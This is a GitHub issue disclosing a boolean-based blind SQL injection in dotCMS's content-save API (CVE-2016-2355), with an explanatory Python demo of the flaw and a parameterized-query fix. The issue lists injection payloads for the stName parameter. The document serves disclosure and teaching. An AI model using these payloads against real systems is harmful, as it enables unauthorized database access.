
SQL Injection Vulnerability (CVE-2016-2355) #8848

Closed
droidsec-cn opened this issue Apr 8, 2016 · 4 comments

@droidsec-cn
commented Apr 8, 2016

Attack details

url: http://localhost:8080/api/content/save/1

postdata:

```
address1=e&address2=e&city=e&contactMe=false&email=sample%40email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus
```

URL encoded POST input stName was set to `-1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'='`

Tests performed:

```
-1' OR 2+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => TRUE
-1' OR 3+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2<(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 3_2>(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 2+1-1-1=1 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 00053=00053 AND 3+1-1-1=1 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=5 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 3_2_0=6 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3_2_1=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
```

Original value: RequestProspectus

```
Parameter: stName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: address1=e&address2=e&city=e&contactMe=false&email=sample@email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus' AND 6745=6745 AND 'ajDn'='ajDn
```
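The report above describes a boolean-based blind injection: two requests that differ only in whether the injected condition is true change the response, which is the oracle the scanner relied on. The following is an added example, not code from this issue or from the dotCMS code base, that reproduces the mechanism against an in-memory SQLite table and shows why a bound parameter closes it. The `structure` table, its columns, and the shape of the lookup query are assumptions standing in for whatever the `stName` parameter actually fed; the true-condition probe is the payload quoted in the report, and the false-condition variant (`6745=6746`) is constructed for contrast.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for a content-type ("structure") lookup.

    The real schema and the exact query behind /api/content/save are not shown
    in the issue; this is an assumed, simplified stand-in.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE structure (inode TEXT, name TEXT)")
    conn.executemany(
        "INSERT INTO structure VALUES (?, ?)",
        [("s-1", "RequestProspectus"), ("s-2", "NewsItem")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, st_name):
    """Vulnerable pattern: the request value is spliced into the SQL text.

    Whatever the caller sends becomes part of the statement, so a quote in
    the value ends the literal and the rest is parsed as SQL.
    """
    sql = "SELECT inode FROM structure WHERE name = '" + st_name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, st_name):
    """Hardened pattern: the value travels as a bound parameter.

    The statement shape is fixed before the value is seen; the database
    compares the whole string, quotes and all, against the name column.
    """
    sql = "SELECT inode FROM structure WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (st_name,))]


# Probe from the issue's report (true condition) and a constructed twin whose
# only difference is a false condition. Against the vulnerable lookup the two
# produce different results, which is exactly the boolean-based blind oracle.
TRUE_PROBE = "RequestProspectus' AND 6745=6745 AND 'ajDn'='ajDn"
FALSE_PROBE = "RequestProspectus' AND 6745=6746 AND 'ajDn'='ajDn"


def demonstrate():
    """Run both lookups with the legitimate value and the two probes."""
    conn = make_db()
    return {
        "vulnerable_legit": lookup_vulnerable(conn, "RequestProspectus"),
        "vulnerable_true": lookup_vulnerable(conn, TRUE_PROBE),
        "vulnerable_false": lookup_vulnerable(conn, FALSE_PROBE),
        "param_legit": lookup_parameterized(conn, "RequestProspectus"),
        "param_true": lookup_parameterized(conn, TRUE_PROBE),
        "param_false": lookup_parameterized(conn, FALSE_PROBE),
    }


if __name__ == "__main__":
    for name, result in demonstrate().items():
        print(f"{name:17s} -> {result}")
```

With the concatenated query the true probe returns the `RequestProspectus` row and the false probe returns nothing, so an observer can distinguish the two without ever seeing an error. With the bound parameter both probes return nothing because no structure is literally named `RequestProspectus' AND 6745=6745 AND 'ajDn'='ajDn`, while the legitimate value still resolves. The same distinction is what a defender should look for when reviewing a fix: the patched code path must never build the statement from the request value.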

@droidsec-cn (Author) commented Apr 12, 2016

May I ask whether there is any new progress on this vulnerability?

@wezell (Contributor) commented Apr 12, 2016

This issue is in the process of being patched for release.

@droidsec-cn (Author) commented Apr 13, 2016

CERT has assigned CVE-2016-2355 to this issue.

droidsec-cn changed the title from "SQL Injection Vulnerability" to "SQL Injection Vulnerability (CVE-2016-2355)" on Apr 13, 2016

@droidsec-cn (Author) commented Apr 13, 2016

Hello, can you update the credit in http://dotcms.com/security/SI-35 with the team name: Nicky of Tencent Security Platform Department
